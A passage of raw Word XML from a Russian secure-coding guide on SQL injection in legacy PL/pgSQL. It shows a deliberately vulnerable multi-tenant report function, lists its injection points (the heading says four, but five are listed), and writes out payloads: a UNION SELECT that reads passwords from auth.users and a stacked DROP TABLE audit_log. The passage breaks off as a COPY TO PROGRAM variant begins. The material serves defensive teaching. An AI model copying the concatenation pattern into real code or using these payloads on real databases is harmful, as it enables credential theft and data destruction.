        </w:rPr>
        <w:t>самая часто встречающаяся форма R18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в legacy plpgsql-кодбазах: разработчик не использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> потому что «не знает» или «слишком verbose», и теряет защиту целиком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD759F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот подраздел — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explicit demonstration антипаттерна</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + showing миграции на 3.16.1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format %I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) + 3.16.3 (USING). Цель — дать команде эталон для рефакторинга legacy plpgsql, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>-concat встречается массово.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726236F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код (полный пример со всеми ошибками).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A4EE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legacy функция, обхожаюющая «common pattern» 2010-х годов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B213415" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Multi-tenant: каждый tenant имеет свою schema (tenant_&lt;id&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7C666" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Функция используется для генерации reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2F671"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39154084" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.generate_report(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58DE44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53E080" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    report_table text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8437A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_col text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A162E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_value text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C31FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order_dir text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6198A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E952E"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22EDDB95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D9CC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql_query text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17433F61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3269C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- АНТИПАТТЕРН: вся конструкция через ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CF541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql_query := 'SELECT * FROM tenant_' || tenant_id || '.' || report_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25699C80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              || ' WHERE ' || filter_col || ' = ''' || filter_value || ''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5A4D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              || ' ORDER BY id ' || order_dir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B13A0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0CC0D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE NOTICE 'executing: %', sql_query;  -- для дебага (само по себе log-leak)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364DDF7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE sql_query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64832515" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163287B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C952D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43AD33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- GRANT EXECUTE ON FUNCTION app.generate_report(text, text, text, text, text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E584CCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--     TO reporting_role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87350F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Четыре независимые injection-точки в одной функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B392C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`tenant_id`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в имя схемы → schema-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D13B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`report_table`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в имя таблицы → identifier-injection (классический R18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A3F4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`filter_col`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в имя колонки WHERE → identifier-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B5580" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`filter_value`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в string-literal с одинарными кавычками → classic SQL injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>-escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517BD1E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`order_dir`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat в ORDER BY → injection в ORDER BY clause (3.14)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162FC8C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bonus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пишет полный constructed SQL в server log — если log-файлы доступны attacker-у, payload visible permanently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42358568" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — три варианта по каждой injection-точке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BB2D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — `filter_value` через quote-escape (классическая SQL injection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65187D3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter_value = "x' UNION SELECT password,1,2,3,4 FROM auth.users--"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778910D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутри функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql_query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собирается как:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60579165" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM tenant_42.users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71BD9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = 'x' UNION SELECT password,1,2,3,4 FROM auth.users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883F56C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196AEB5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Стандартная UNION-injection (3.1) — атакующий читает passwords из auth.users-схемы. Граница с 3.16.1: здесь injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>value-position</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (отсутствие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>filter_value</w:t>
      </w:r>
      <w:r>
        <w:t>), не identifier-position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3C199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — `report_table` через identifier-injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6E59F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>report_table = "users; DROP TABLE audit_log; --"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93D2D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM tenant_42.users; DROP TABLE audit_log; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C3FEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = '...' ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD14F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Multi-statement через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SELECT возвращает rows (caller получает result), DROP исполняется. Если функция SECURITY DEFINER + owner=superuser — DROP исполняется под superuser, любая таблица в БД может быть удалена. Граница с 3.16.1: classic identifier-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t>-style concat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019B4C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — `tenant_id` через schema injection с COPY TO PROGRAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538EB7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
